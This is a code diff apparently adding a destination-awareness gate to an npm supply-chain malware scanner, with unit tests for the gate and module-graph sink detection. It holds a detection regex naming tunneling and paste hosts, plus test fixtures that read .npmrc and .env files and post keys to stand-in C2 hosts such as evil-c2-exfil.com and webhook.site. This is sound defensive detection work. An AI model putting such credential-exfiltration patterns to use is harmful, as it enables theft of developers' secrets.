+// it is legitimate SDK usage, not credential exfiltration.
+// Safe-by-default: unknown env vars or unknown domains remain CRITICAL.
+const SDK_ENV_DOMAIN_MAP = [
+  { envPattern: /^AWS_/i, domains: ['amazonaws.com', 'aws.amazon.com'] },
+  { envPattern: /^AZURE_/i, domains: ['azure.com', 'microsoft.com'] },
+  { envPattern: /^GOOGLE_|^GCP_/i, domains: ['googleapis.com', 'google.com'] },
+  { envPattern: /^FIREBASE_/i, domains: ['firebase.com', 'googleapis.com'] },
+  { envPattern: /^SALESFORCE_/i, domains: ['salesforce.com', 'force.com'] },
+  { envPattern: /^SUPABASE_/i, domains: ['supabase.co', 'supabase.com'] },
+  { envPattern: /^MAILGUN_/i, domains: ['mailgun.net', 'mailgun.com'] },
+  { envPattern: /^STRIPE_/i, domains: ['stripe.com'] },
+  { envPattern: /^TWILIO_/i, domains: ['twilio.com'] },
+  { envPattern: /^SENDGRID_/i, domains: ['sendgrid.com', 'sendgrid.net'] },
+  { envPattern: /^DATADOG_/i, domains: ['datadoghq.com'] },
+  { envPattern: /^SENTRY_/i, domains: ['sentry.io'] },
+  { envPattern: /^SLACK_/i, domains: ['slack.com'] },
+  { envPattern: /^GITHUB_/i, domains: ['github.com', 'githubusercontent.com'] },
+  { envPattern: /^GITLAB_/i, domains: ['gitlab.com'] },
+  { envPattern: /^CLOUDFLARE_/i, domains: ['cloudflare.com'] },
+  { envPattern: /^OPENAI_/i, domains: ['openai.com'] },
+  { envPattern: /^ANTHROPIC_/i, domains: ['anthropic.com'] },
+  { envPattern: /^MONGODB_|^MONGO_/i, domains: ['mongodb.com', 'mongodb.net'] },
+  { envPattern: /^AUTH0_/i, domains: ['auth0.com'] },
+  { envPattern: /^HUBSPOT_/i, domains: ['hubspot.com', 'hubapi.com'] },
+  { envPattern: /^CONTENTFUL_/i, domains: ['contentful.com'] },
+];
+
+// Tokens stripped when extracting brand keyword from env var name
+const ENV_NOISE_TOKENS = new Set([
+  'API', 'KEY', 'SECRET', 'TOKEN', 'PASSWORD', 'CREDENTIAL',
+  'AUTH', 'ACCESS', 'PRIVATE', 'PUBLIC', 'CLIENT', 'ID', 'URL'
+]);
+
+// Suspicious tunneling/proxy domains — never considered legitimate SDK destinations
+const SUSPICIOUS_DOMAIN_PATTERNS = /ngrok|serveo|localtunnel|burpcollaborator|requestbin|pipedream|webhook\.site/i;
+
+// URL extraction regex (matches http/https URLs in source code)
+const URL_EXTRACT_RE = /https?:\/\/[a-zA-Z0-9\-._~:/?#[\]@!$&'()*+,;=%]+/g;
+
+// Hostname extraction from Node.js request options: hostname: 'domain.com' or host: 'domain.com'
+const HOSTNAME_OPTION_RE = /(?:hostname|host)\s*:\s*['"`]([a-zA-Z0-9\-._]+)['"`]/g;
+
+/**
+ * Extract env var name from an intent source threat message.
+ * Messages look like: "process.env.SALESFORCE_API_KEY", "env var MAILGUN_API_KEY accessed"
+ */
+function extractEnvVarFromMessage(sourceThreats) {
+  for (const t of sourceThreats) {
+    if (!t.message) continue;
+    // Match process.env.VAR_NAME pattern
+    const envMatch = t.message.match(/process\.env\.([A-Z_][A-Z0-9_]*)/i);
+    if (envMatch) return envMatch[1];
+    // Match standalone VAR_NAME patterns (e.g., "SALESFORCE_API_KEY")
+    const varMatch = t.message.match(/\b([A-Z][A-Z0-9]*(?:_[A-Z0-9]+)+)\b/);
+    if (varMatch) return varMatch[1];
+  }
+  return null;
+}
+
+/**
+ * Extract brand keyword from env var name by removing noise tokens.
+ * MAILGUN_API_KEY → MAILGUN, SALESFORCE_CLIENT_SECRET → SALESFORCE
+ */
+function extractBrandFromEnvVar(envVarName) {
+  const parts = envVarName.toUpperCase().split('_');
+  const brandParts = parts.filter(p => !ENV_NOISE_TOKENS.has(p) && p.length > 0);
+  return brandParts.length > 0 ? brandParts[0] : null;
+}
+
+/**
+ * Extract domain from a URL string.
+ * Returns the hostname (without port).
+ */
+function extractDomain(url) {
+  try {
+    // Capture only valid hostname characters so a path-less URL immediately followed by
+    // a quote/paren (e.g. fetch('https://api.openai.com')) does not absorb the trailing
+    // ')" into the host. Stops at /, :, ?, #, quotes, parens, etc.
+    const match = url.match(/^https?:\/\/([a-zA-Z0-9.\-]+)/i);
+    return match ? match[1].toLowerCase() : null;
+  } catch {
+    return null;
+  }
+}
+
+/**
+ * Check if a domain matches any of the expected SDK domains (suffix match).
+ * api.mailgun.net matches mailgun.net, sub.api.stripe.com matches stripe.com
+ */
+function domainMatchesSuffix(domain, expectedDomains) {
+  for (const expected of expectedDomains) {
+    if (domain === expected || domain.endsWith('.' + expected)) return true;
+  }
+  return false;
+}
+
+/**
+ * Check if an env var + file content represents a legitimate SDK pattern.
+ *
+ * Returns true ONLY if:
+ * 1. The env var matches a known SDK mapping (allowlist) OR heuristic brand match
+ * 2. ALL URLs in the file point to domains matching the expected SDK
+ * 3. No suspicious tunneling/proxy domains are present
+ *
+ * @param {string} envVarName - e.g., "SALESFORCE_API_KEY"
+ * @param {string} fileContent - source code of the file
+ * @returns {boolean} true if SDK pattern (should skip intent pair)
+ */
+function isSDKPattern(envVarName, fileContent) {
+  // Extract domains from full URLs (https://api.stripe.com/v1/charges)
+  const urls = fileContent.match(URL_EXTRACT_RE) || [];
+  const domains = urls.map(u => extractDomain(u)).filter(Boolean);
+
+  // Also extract hostnames from Node.js request options (hostname: 'api.stripe.com')
+  let hostnameMatch;
+  const hostnameRe = new RegExp(HOSTNAME_OPTION_RE.source, 'g');
+  while ((hostnameMatch = hostnameRe.exec(fileContent)) !== null) {
+    const hostname = hostnameMatch[1].toLowerCase();
+    if (hostname && !domains.includes(hostname)) {
+      domains.push(hostname);
+    }
+  }
+
+  // No URLs found — can't confirm SDK pattern, default to suspicious
+  if (domains.length === 0) return false;
+
+  // Check for suspicious tunneling domains — immediate fail
+  for (const domain of domains) {
+    if (SUSPICIOUS_DOMAIN_PATTERNS.test(domain)) return false;
+  }
+
+  // Check for raw IP addresses — immediate fail
+  for (const domain of domains) {
+    if (/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/.test(domain)) return false;
+  }
+
+  // 1. Try curated allowlist first (strict: ALL domains must match)
+  // Curated allowlist is authoritative — no relaxation here to prevent
+  // attacker injecting a legitimate domain alongside their C2 domain.
+  for (const mapping of SDK_ENV_DOMAIN_MAP) {
+    if (mapping.envPattern.test(envVarName)) {
+      return domains.every(d => domainMatchesSuffix(d, mapping.domains));
+    }
+  }
+
+  // R2: credential-suffixed env vars get relaxed domain matching (at least ONE match).
+  // SDKs commonly call their own API + CDN/logging/analytics domains.
+  // Safety: suspicious domains and raw IPs are already rejected above.
+  // Only applies to the heuristic fallback — curated allowlist stays strict.
+  const CREDENTIAL_SUFFIXES = ['_API_KEY', '_SECRET', '_TOKEN', '_SECRET_KEY', '_ACCESS_KEY'];
+  const upperName = envVarName.toUpperCase();
+  const hasCredentialSuffix = CREDENTIAL_SUFFIXES.some(s => upperName.endsWith(s));
+
+  // 2. Heuristic fallback: extract brand keyword and check domain labels
+  const brand = extractBrandFromEnvVar(envVarName);
+  if (!brand || brand.length < 3) return false; // Too short for reliable matching
+
+  const brandLower = brand.toLowerCase();
+  // 2a. Strict check: every domain matches brand (existing behavior)
+  // e.g., brand "ACME" matches "api.acme.com" (label "acme") but not "api.acmetech.com"
+  if (domains.every(d => {
+    const labels = d.split('.');
+    return labels.some(label => label === brandLower);
+  })) return true;
+
+  // 2b. R2 relaxed: credential suffix + at least one domain matches brand
+  if (hasCredentialSuffix && domains.some(d => {
+    const labels = d.split('.');
+    return labels.some(label => label === brandLower);
+  })) return true;
+
+  return false;
+}
+
+// ============================================
+// DESTINATION-BENIGNNESS GATE (env-var-independent)
+// ============================================
+// isSDKPattern() needs a single extractable env var + matching domain. That model
+// breaks on (a) multi-provider files (a CLI that reads GEMINI_API_KEY *and*
+// ANTHROPIC_API_KEY and calls both), and (b) flows whose credential source has no
+// extractable env var (cross_file_dataflow / detached compounds). For those, judge the
+// DESTINATIONS, not the env var: a credential→network flow is benign iff EVERY network
+// host in scope is provably non-exfil.
+//
+// Benign classes (NOT attacker-spoofable):
+//   - loopback / RFC1918 private / link-local IPs, localhost, *.local        (local IPC)
+//   - reserved test domains (example.com, *.test, *.invalid)                 (RFC 2606/6761)
+//   - curated SaaS/cloud/AI provider API domains                            (cannot echo a
+//     POST body back to a third party — UNLIKE paste sites / bot webhooks, deliberately
+//     EXCLUDED, see SUSPICIOUS_DOMAIN_PATTERNS + the exclusion note below)
+// Deliberately NOT benign: package "own domain" from package.json (attacker writes it),
+// unknown domains, public IPs, suspicious tunnels/paste hosts. Any of those ⇒ keep firing.
+// Safe-by-default: no extractable host ⇒ NOT benign (do not suppress).
+
+// AI providers (2025-26) absent from the env→domain map. Bot/messaging/paste channels
+// (telegram, discord webhooks, pastebin, gist, transfer.sh, …) are intentionally absent:
+// they CAN relay an exfil POST to the attacker, so they must keep firing.
+const AI_PROVIDER_DOMAIN_SUFFIXES = [
+  'claude.com', 'openrouter.ai', 'deepseek.com', 'x.ai', 'mistral.ai', 'cohere.ai',
+  'cohere.com', 'huggingface.co', 'perplexity.ai', 'groq.com', 'together.ai',
+  'together.xyz', 'replicate.com', 'fireworks.ai', 'anyscale.com', 'ai21.com',
+  'voyageai.com', 'deepinfra.com',
+];
+
+// Flat suffix list = every domain already curated in SDK_ENV_DOMAIN_MAP + the AI extras.
+// Derived (not duplicated) so the two stay in sync. Matched via domainMatchesSuffix, which
+// is label-anchored: 'evilx.ai' does NOT match 'x.ai'.
+const PROVIDER_DOMAIN_SUFFIXES = Array.from(new Set([
+  ...SDK_ENV_DOMAIN_MAP.flatMap(m => m.domains),
+  ...AI_PROVIDER_DOMAIN_SUFFIXES,
+]));
+
+function stripPort(host) {
+  let h = String(host).trim().toLowerCase();
+  // Bracketed IPv6 with optional port: [::1]:443 / [::1] → ::1
+  const br = h.match(/^\[([^\]]+)\]/);
+  if (br) return br[1];
+  // host:port for IPv4 / hostname — only when there's a single colon (bare IPv6 like
+  // ::1 has multiple colons and must NOT be truncated).
+  if ((h.match(/:/g) || []).length === 1) h = h.replace(/:\d+$/, '');
+  return h;
+}
+
+// loopback / RFC1918 private / link-local / localhost / reserved-test domain.
+function isLocalOrReservedHost(host) {
+  const h = stripPort(host);
+  if (!h) return false;
+  if (h === 'localhost' || h.endsWith('.localhost') || h.endsWith('.local')) return true;
+  if (h === '::1' || h === '0:0:0:0:0:0:0:1') return true; // IPv6 loopback
+  if (h === 'example.com' || h === 'example.org' || h === 'example.net') return true;
+  if (h.endsWith('.example.com') || h.endsWith('.example.org') || h.endsWith('.example.net')) return true;
+  if (h.endsWith('.example') || h.endsWith('.test') || h.endsWith('.invalid')) return true;
+  const m = h.match(/^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/);
+  if (m) {
+    const a = +m[1], b = +m[2];
+    if (a === 127 || a === 0) return true;            // loopback / this-host
+    if (a === 10) return true;                        // 10.0.0.0/8
+    if (a === 172 && b >= 16 && b <= 31) return true; // 172.16.0.0/12
+    if (a === 192 && b === 168) return true;          // 192.168.0.0/16
+    if (a === 169 && b === 254) return true;          // 169.254.0.0/16 link-local
+    return false;                                     // any other IPv4 literal = public
+  }
+  return false;
+}
+
+// A public (non-loopback/private) IPv4 literal — a direct-IP exfil endpoint (ecto pattern).
+function isPublicIpHost(host) {
+  const h = stripPort(host);
+  if (!/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/.test(h)) return false;
+  return !isLocalOrReservedHost(h);
+}
+
+// Extract every network host referenced in a file (URLs + Node request options).
+function extractHostsFromContent(fileContent) {
+  if (!fileContent) return [];
+  const urls = fileContent.match(URL_EXTRACT_RE) || [];
+  const hosts = urls.map(u => extractDomain(u)).filter(Boolean);
+  let m;
+  const re = new RegExp(HOSTNAME_OPTION_RE.source, 'g');
+  while ((m = re.exec(fileContent)) !== null) {
+    const h = m[1].toLowerCase();
+    if (h && !hosts.includes(h)) hosts.push(h);
+  }
+  // Bare host literals assigned as defaults, e.g. `process.env.HOST || "127.0.0.1"` then
+  // used as `host: HOST` (common "configurable local collector" shape — the variable host
+  // isn't matched above). Capture quoted IPv4 / localhost / 0.0.0.0 literals. Safe: any
+  // co-present public IP or unknown host still fails the all-benign check downstream, so
+  // this can only RELAX a file whose every literal host is loopback/private.
+  const LITERAL_HOST_RE = /['"`](localhost|0\.0\.0\.0|(?:\d{1,3}\.){3}\d{1,3})['"`]/g;
+  while ((m = LITERAL_HOST_RE.exec(fileContent)) !== null) {
+    const h = m[1].toLowerCase();
+    if (h && !hosts.includes(h)) hosts.push(h);
+  }
+  return hosts;
+}
+
+/**
+ * Destination-benignness gate for credential→network taint flows whose env var is not
+ * (or need not be) known. Returns true ONLY if EVERY extracted host is provably non-exfil
+ * (local/reserved OR a curated provider). Any suspicious/paste host, public IP, or unknown
+ * domain ⇒ false. No hosts found ⇒ false (cannot confirm).
+ *
+ * @param {string} fileContent - source of the file containing the network sink
+ * @returns {boolean} true ⇒ first-party/local, safe to downgrade the taint flow
+ */
+function networkDestinationsAllBenign(fileContent) {
+  const hosts = extractHostsFromContent(fileContent);
+  if (hosts.length === 0) return false;
+  for (const h of hosts) {
+    if (SUSPICIOUS_DOMAIN_PATTERNS.test(h)) return false;
+    if (isPublicIpHost(h)) return false;
+    if (isLocalOrReservedHost(h)) continue;
+    if (PROVIDER_DOMAIN_SUFFIXES.some(s => domainMatchesSuffix(h, [s]))) continue;
+    return false; // unknown / unrecognised destination → keep firing
+  }
+  return true;
+}
+
+module.exports = {
+  SDK_ENV_DOMAIN_MAP,
+  ENV_NOISE_TOKENS,
+  SUSPICIOUS_DOMAIN_PATTERNS,
+  URL_EXTRACT_RE,
+  HOSTNAME_OPTION_RE,
+  PROVIDER_DOMAIN_SUFFIXES,
+  extractEnvVarFromMessage,
+  extractBrandFromEnvVar,
+  extractDomain,
+  domainMatchesSuffix,
+  isSDKPattern,
+  stripPort,
+  isLocalOrReservedHost,
+  isPublicIpHost,
+  extractHostsFromContent,
+  networkDestinationsAllBenign,
+};

--- a/tests/run-tests.js
+++ b/tests/run-tests.js
@@ -104,6 +104,7 @@ const { runConfidenceTiersTests } = require('./unit/confidence-tiers.test');
 const { runCompoundTighteningTests } = require('./unit/compound-tightening.test');
 const { runStagedRemoteLoaderTests } = require('./unit/staged-remote-loader.test');
 const { runSinkCouplingTests } = require('./unit/sink-coupling.test');
+const { runSdkDestinationTests } = require('./unit/sdk-destination.test');
 const { runLlmDetectiveTests } = require('./unit/llm-detective.test');
 const { runTarballArchiveTests } = require('./unit/tarball-archive.test');
 const { runScanLedgerTests } = require('./unit/scan-ledger.test');
@@ -362,6 +363,8 @@ async function timed(name, fn) {
 
   // FPR sink-coupling gate (credential_regex_harvest — chantier 2026-06)
   await timed('sink-coupling', runSinkCouplingTests);
+  // FPR destination-awareness gate (segment A taint FPs — chantier 2026-06)
+  await timed('sdk-destination', runSdkDestinationTests);
 
   // ML classifier tests (v2.10.0)
   await timed('ml-classifier', runMLClassifierTests);

--- a/tests/scanner/module-graph.test.js
+++ b/tests/scanner/module-graph.test.js
@@ -1488,6 +1488,103 @@ async function runModuleGraphTests() {
       cleanup(tmp);
     }
   });
+
+  // === Option 2 (segment A): process.*/console.* receivers are local I/O, not network sinks ===
+  // SINK_INSTANCE_METHODS (connect/write/send) matched by method name alone, so
+  // process.stdout/stderr.write, process.send (IPC) and console.* read as "cross-file network
+  // exfil" sinks (FP drivers: contextdevkit, amicus). getReceiverRootName + the
+  // NON_NETWORK_SINK_RECEIVER_ROOTS gate reject those while keeping real socket/ws/req sinks.
+  test('module-graph: process.stdout/stderr.write is console I/O, not a network sink (segment-A FP)', () => {
+    const tmp = makeTmpDir();
+    try {
+      writeFile(tmp, 'reader.js', `
+        const fs = require('fs');
+        module.exports = { read() { return fs.readFileSync('.npmrc', 'utf8'); } };
+      `);
+      writeFile(tmp, 'writer.js', `
+        module.exports = { emit(d) { process.stdout.write(d); process.stderr.write(d); } };
+      `);
+      writeFile(tmp, 'index.js', `
+        const reader = require('./reader');
+        const writer = require('./writer');
+        writer.emit(reader.read());
+      `);
+      const graph = buildModuleGraph(tmp);
+      const tainted = annotateTaintedExports(graph, tmp);
+      const sinks = annotateSinkExports(graph, tmp);
+      const flows = detectCrossFileFlows(graph, tainted, sinks, tmp);
+      assert(flows.length === 0, `process.stdout/stderr.write is console I/O, expected 0 flows, got ${flows.length}`);
+    } finally {
+      cleanup(tmp);
+    }
+  });
+
+  test('module-graph: process.send (child IPC) is not a network sink', () => {
+    const tmp = makeTmpDir();
+    try {
+      writeFile(tmp, 'reader.js', `
+        const fs = require('fs');
+        module.exports = { read() { return fs.readFileSync('.env', 'utf8'); } };
+      `);
+      writeFile(tmp, 'writer.js', `
+        module.exports = { emit(d) { process.send(d); } };
+      `);
+      writeFile(tmp, 'index.js', `
+        const reader = require('./reader');
+        const writer = require('./writer');
+        writer.emit(reader.read());
+      `);
+      const graph = buildModuleGraph(tmp);
+      const tainted = annotateTaintedExports(graph, tmp);
+      const sinks = annotateSinkExports(graph, tmp);
+      const flows = detectCrossFileFlows(graph, tainted, sinks, tmp);
+      assert(flows.length === 0, `process.send is IPC to the parent, expected 0 flows, got ${flows.length}`);
+    } finally {
+      cleanup(tmp);
+    }
+  });
+
+  test('module-graph: getSinkName keeps real socket/ws/net sinks, drops process/console (FN guard)', () => {
+    const acorn = require('acorn');
+    const { getSinkName } = require('../../src/scanner/module-graph/detect-cross-file.js');
+    const sinkOf = (code) => {
+      const ast = acorn.parse(code, { ecmaVersion: 2022 });
+      let res = null;
+      (function w(n) {
+        if (!n || res || typeof n !== 'object') return;
+        if (n.type === 'CallExpression') { const s = getSinkName(n); if (s) { res = s; return; } }
+        for (const k in n) { const v = n[k]; if (Array.isArray(v)) v.forEach(w); else if (v && typeof v === 'object') w(v); }
+      })(ast);
+      return res;
+    };
+    // Real network sinks on non-process/console receivers must STILL be classified as sinks:
+    assert(sinkOf('socket.write(d)') === 'write()', 'socket.write must stay a sink');
+    assert(sinkOf('ws.send(d)') === 'send()', 'ws.send must stay a sink');
+    assert(sinkOf('conn.connect(o)') === 'connect()', 'conn.connect must stay a sink');
+    assert(sinkOf('this.sender.send(d)') === 'send()', 'this.sender.send must stay a sink (non-Identifier root)');
+    assert(sinkOf('net.connect(1234, h)') === 'connect()', 'net.connect must stay a sink');
+    assert(sinkOf('http.request({ hostname: h }, cb)') === 'http.request()', 'http.request must stay a sink');
+    // Local I/O receivers must NOT be classified as network sinks:
+    assert(sinkOf('process.stdout.write(d)') === null, 'process.stdout.write is not a network sink');
+    assert(sinkOf('process.stderr.write(d)') === null, 'process.stderr.write is not a network sink');
+    assert(sinkOf('process.send(d)') === null, 'process.send (IPC) is not a network sink');
+    assert(sinkOf('console.write(d)') === null, 'console.write is not a network sink');
+  });
+
+  test('module-graph: getReceiverRootName resolves the receiver root for sink gating', () => {
+    const acorn = require('acorn');
+    const { getReceiverRootName } = require('../../src/scanner/module-graph/parse-utils.js');
+    const rootOf = (code) => {
+      const ast = acorn.parse(code, { ecmaVersion: 2022 });
+      return getReceiverRootName(ast.body[0].expression.callee);
+    };
+    assert(rootOf('process.stdout.write(x)') === 'process', 'process.stdout.write -> process');
+    assert(rootOf('process.send(x)') === 'process', 'process.send -> process');
+    assert(rootOf('console.error(x)') === 'console', 'console.error -> console');
+    assert(rootOf('socket.write(x)') === 'socket', 'socket.write -> socket');
+    assert(rootOf('net.connect(p, h)') === 'net', 'net.connect -> net');
+    assert(rootOf('this.sender.send(x)') === null, 'this.sender.send -> null (non-Identifier root)');
+  });
 }
 
 module.exports = { runModuleGraphTests };

--- a/tests/unit/sdk-destination.test.js
+++ b/tests/unit/sdk-destination.test.js
@@ -1,0 +1,125 @@
+'use strict';
+
+// Destination-awareness gate (chantier FPR segment A — FPR-segment-A-diagnosis-2026-06-14.md).
+// A credential→network taint flow (intent_credential_exfil / cross_file_dataflow /
+// detached_credential_exfil) is a FALSE POSITIVE when EVERY network destination is provably
+// non-exfil: loopback/private/reserved IP, or a curated SaaS/cloud/AI provider API. Any
+// suspicious/paste host, public IP, or UNKNOWN domain ⇒ keep firing (anti-evasion floor).
+// These tests LOCK the gate semantics AND the garde-fou (real exfil — provider+C2, public
+// IP, paste site — must NOT be classified benign). All behavioral: call the functions.
+
+const fs = require('fs');
+const os = require('os');
+const path = require('path');
+const { test, assert } = require('../test-utils');
+const {
+  networkDestinationsAllBenign, isLocalOrReservedHost, isPublicIpHost,
+  extractHostsFromContent, domainMatchesSuffix,
+} = require('../../src/sdk-destination.js');
+const { filterFirstPartyNetworkFlows } = require('../../src/scanner/module-graph');
+
+async function runSdkDestinationTests() {
+  console.log('\n=== SDK DESTINATION GATE TESTS (segment A) ===\n');
+
+  // ---- networkDestinationsAllBenign: BENIGN (suppress) ----
+  test('dest-gate: single provider (anthropic) → benign', () => {
+    assert(networkDestinationsAllBenign("fetch('https://api.anthropic.com/v1/messages')") === true);
+  });
+  test('dest-gate: multi-provider (gemini googleapis + anthropic) → benign', () => {
+    const c = "fetch('https://generativelanguage.googleapis.com/v1'); https.request({hostname:'api.anthropic.com'})";
+    assert(networkDestinationsAllBenign(c) === true);
+  });
+  test('dest-gate: AI providers added in 2025-26 (openrouter+deepseek+openai) → benign', () => {
+    const c = "fetch('https://openrouter.ai/api'); fetch('https://api.deepseek.com/v1'); fetch('https://api.openai.com')";
+    assert(networkDestinationsAllBenign(c) === true);
+  });
+  test('dest-gate: loopback-only (otel collector) → benign', () => {
+    assert(networkDestinationsAllBenign("fetch('http://localhost:4318/v1/traces')") === true);
+  });
+  test('dest-gate: env-default literal host `|| "127.0.0.1"` (remnic pattern) → benign', () => {
+    const c = 'const HOST = process.env.REMNIC_HOST || "127.0.0.1";\nhttp.request({ host: HOST, port: 4318 })';
+    assert(networkDestinationsAllBenign(c) === true);
+  });
+  test('dest-gate: reserved test domain (example.com) → benign', () => {
+    assert(networkDestinationsAllBenign("fetch('https://example.com/x')") === true);
+  });
+
+  // ---- networkDestinationsAllBenign: NOT benign (keep firing) — the garde-fou ----
+  test('dest-gate: ecto pattern (webhook.site + public IP + loopback) → NOT benign', () => {
+    const c = "fetch('https://webhook.site/x'); fetch('http://154.57.164.82:31250'); fetch('http://127.0.0.1:31250')";
+    assert(networkDestinationsAllBenign(c) === false);
+  });
+  test('dest-gate: provider + C2 on a normal domain → NOT benign (anti-evasion)', () => {
+    assert(networkDestinationsAllBenign("fetch('https://api.openai.com'); fetch('https://evil-c2.com/x')") === false);
+  });
+  test('dest-gate: unknown domain alone → NOT benign', () => {
+    assert(networkDestinationsAllBenign("fetch('https://my-random-host.io/collect')") === false);
+  });
+  test('dest-gate: public IP literal → NOT benign', () => {
+    assert(networkDestinationsAllBenign("https.request({host:'203.0.113.7'})") === false);
+  });
+  test('dest-gate: suffix is label-anchored — evilx.ai does NOT match provider x.ai → NOT benign', () => {
+    assert(networkDestinationsAllBenign("fetch('https://evilx.ai/x')") === false);
+  });
+  test('dest-gate: no extractable host → NOT benign (cannot confirm)', () => {
+    assert(networkDestinationsAllBenign("const data = readFileSync(p); send(data)") === false);
+  });
+
+  // ---- host classifiers ----
+  test('host: loopback / private / link-local → local', () => {
+    ['127.0.0.1', '10.0.0.5', '192.168.1.1', '172.20.0.1', '169.254.0.1', 'localhost', '::1']
+      .forEach(h => assert(isLocalOrReservedHost(h) === true, `expected local: ${h}`));
+  });
+  test('host: public IPv4 → not local, is public', () => {
+    assert(isLocalOrReservedHost('154.57.164.82') === false);
+    assert(isPublicIpHost('154.57.164.82') === true);
+    assert(isPublicIpHost('127.0.0.1') === false);
+  });
+  test('host: 172.32.x is public (outside 172.16/12)', () => {
+    assert(isLocalOrReservedHost('172.32.0.1') === false);
+    assert(isPublicIpHost('172.32.0.1') === true);
+  });
+
+  // ---- extractHostsFromContent ----
+  test('extract: URLs + request-option hostnames + literal IP defaults', () => {
+    const hosts = extractHostsFromContent("fetch('https://api.x.ai/v1'); https.request({hostname:'api.anthropic.com'}); const H = e || '127.0.0.1';");
+    assert(hosts.includes('api.x.ai') && hosts.includes('api.anthropic.com') && hosts.includes('127.0.0.1'), JSON.stringify(hosts));
+  });
+
+  test('provider suffix match is anchored (domainMatchesSuffix)', () => {
+    assert(domainMatchesSuffix('api.x.ai', ['x.ai']) === true);
+    assert(domainMatchesSuffix('evilx.ai', ['x.ai']) === false);
+  });
+
+  // ---- filterFirstPartyNetworkFlows (cross_file_dataflow gate) ----
+  const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'sdkdest-'));
+  fs.writeFileSync(path.join(tmp, 'provider.js'), "fetch('https://api.anthropic.com/v1', {headers:{x:key}});");
+  fs.writeFileSync(path.join(tmp, 'evil.js'), "fetch('https://evil-c2-exfil.com/collect', {body:key});");
+  fs.writeFileSync(path.join(tmp, 'ipc.js'), "ipc.write(key); // electron IPC, no network host");
+  fs.writeFileSync(path.join(tmp, 'exec.js'), "const x = eval(key);");
+  const mk = (sink, sinkFile) => ({ type: 'cross_file_dataflow', severity: 'CRITICAL', sourceFile: 'store.js', source: 'process.env', sink, sinkFile });
+
+  test('flow-gate: provider-only network sink → dropped', () => {
+    const kept = filterFirstPartyNetworkFlows([mk('fetch()', 'provider.js')], tmp);
+    assert(kept.length === 0, `expected dropped, kept ${kept.length}`);
+  });
+  test('flow-gate: evil-C2 network sink → kept', () => {
+    const kept = filterFirstPartyNetworkFlows([mk('fetch()', 'evil.js')], tmp);
+    assert(kept.length === 1);
+  });
+  test('flow-gate: IPC write() with no host → kept (cannot confirm benign)', () => {
+    const kept = filterFirstPartyNetworkFlows([mk('write()', 'ipc.js')], tmp);
+    assert(kept.length === 1);
+  });
+  test('flow-gate: exec sink (eval) → kept (never destination-gated)', () => {
+    const kept = filterFirstPartyNetworkFlows([mk('eval()', 'exec.js')], tmp);
+    assert(kept.length === 1);
+  });
+  test('flow-gate: mixed batch → only provider flow dropped', () => {
+    const kept = filterFirstPartyNetworkFlows(
+      [mk('fetch()', 'provider.js'), mk('fetch()', 'evil.js'), mk('write()', 'ipc.js'), mk('eval()', 'exec.js')], tmp);
+    assert(kept.length === 3 && !kept.some(f => f.sinkFile === 'provider.js'), JSON.stringify(kept.map(f => f.sinkFile)));
+  });
+}
+
+module.exports = { runSdkDestinationTests };


### PR DESCRIPTION
Option 1: destination-benignness gate sur les 3 detecteurs de taint. Option 2: process/console exclus comme sinks reseau. contextdevkit 36->10. ecto TP retenu. 4390 passed, 8 env-artifacts. Fondation pour segments B/C.